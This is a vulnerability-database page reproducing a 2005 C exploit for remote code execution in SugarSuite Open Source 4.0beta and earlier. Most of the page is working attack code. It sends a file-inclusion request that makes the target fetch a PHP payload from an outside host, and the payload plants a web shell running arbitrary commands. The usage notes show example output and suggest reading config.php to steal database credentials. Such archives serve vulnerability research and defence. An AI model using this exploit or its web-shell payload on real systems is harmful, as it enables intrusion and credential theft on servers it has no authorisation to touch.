Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit (c)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 24 Views

SugarSuite Open Source <= 4.0beta Remote Code Execution Exploi

Code

                                                /*

gcc -o sugar sugar.c

Usage ./sugar [host] [/path/] [site] [cmd]

Sugar Suite Open Source &#60;= 4.0 beta remote code execution (c code)
coded by: pointslash v.
credits: rgod, unitedasia

host - hostname (ex: www.sitename.com)
path - path (ex: /sugar/ or just / )
site - remote location ( ex: http://www.somesite.com/file.txt)
cmd  - specify a command (&#34;cat config.php&#34; to see database username & password)

example ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a;

Put this in your file.txt

&#60;?php
$fp=fopen(&#34;pointslash.php&#34;,&#34;w&#34;);
fputs($fp,&#34;&#60;? error_reporting(0);ini_set(&#39;max_execution_time&#39;,0); system(\$HTTP_GET_VARS[cmd]);?&#62;&#34;);
fclose($fp);
?&#62;

./sugar  www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html

Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown


*/

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;errno.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;netinet/in.h&#62;
#include &#60;netdb.h&#62;

#define HTTP_PORT 80


#define DATA &#34;\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n&#60;?php\n$fp=fopen(\&#34;pointslash.php\&#34;,\&#34;w\&#34;);\nfputs($fp,\&#34;&#60;? error_reporting(0);ini_set(&#39;max_execution_time&#39;,0); system(\\$HTTP_GET_VARS[cmd]);?&#62;\&#34;);\nfclose($fp);\n?&#62;\n\n&#34;


/****************** MAIN *********************/

void sendpacket(char buffer[8192], int p, char host[100]);


int main( int argc, char **argv)
{

    char buffer[8192];
    int count;
    char data[190];
    if(argc&#60;5)
    {
         printf(&#34;Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source &#60;= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n&#34;,argv[0]);
         printf(&#34;host - hostname (ex:www.sitename.com)\n&#34;);
         printf(&#34;path - path (ex: /sugar/ or just / )\n&#34;);
         printf(&#34;site - remote location ( ex: http://www.somesite.com/file.txt)\n&#34;);
         printf(&#34;cmd  - specify a command (\&#34;cat config.php\&#34; to see database username & password)\n&#34;);
         sprintf(data, DATA);
         printf(data);
         exit(1);
    }


    sprintf( buffer, &#34;GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n&#34;, argv[2], argv[3], argv[1]);

    sendpacket(buffer,0,argv[1]);

    sprintf( buffer, &#34;GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n&#34;, argv[2], argv[4], argv[1]);

    sendpacket(buffer,1,argv[1]);

    return count;
}

void sendpacket(char buffer[8192], int p, char host[100])
{

    struct sockaddr_in server;
    struct hostent *host_info;
    unsigned long addr;
    int sock;
    char dat[8192];
    int count;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock &#60; 0) {
        perror( &#34;failed to create socket&#34;);
        exit(1);
    }

    /* Create socketadress of Server
     * it is type, IP-adress and portnumber */
    memset( &server, 0, sizeof (server));

    /* convert the Servername to a IP-Adress */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, &#34;unknown server: %s\n&#34;, host);
        exit(1);
    }
    memcpy( (char *)&server.sin_addr, host_info-&#62;h_addr, host_info-&#62;h_length);

    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);


    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) &#60; 0) {
        perror( &#34;can&#39;t connect to server&#34;);
        exit(1);
    }

    send( sock, buffer, strlen( buffer), 0);

    /* get the answer from server and put it out to stdout */
    if (p==1) {
      do {
          count = recv( sock, buffer, sizeof(buffer), 0);
          write( 1, buffer, count);
      }
      while (count &#62; 0);
    }

    /* close the connection to the server */
    close ( sock);

}

// milw0rm.com [2005-12-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
sugarsuiteremote code executionexploitpointslashrgodunitedasia
24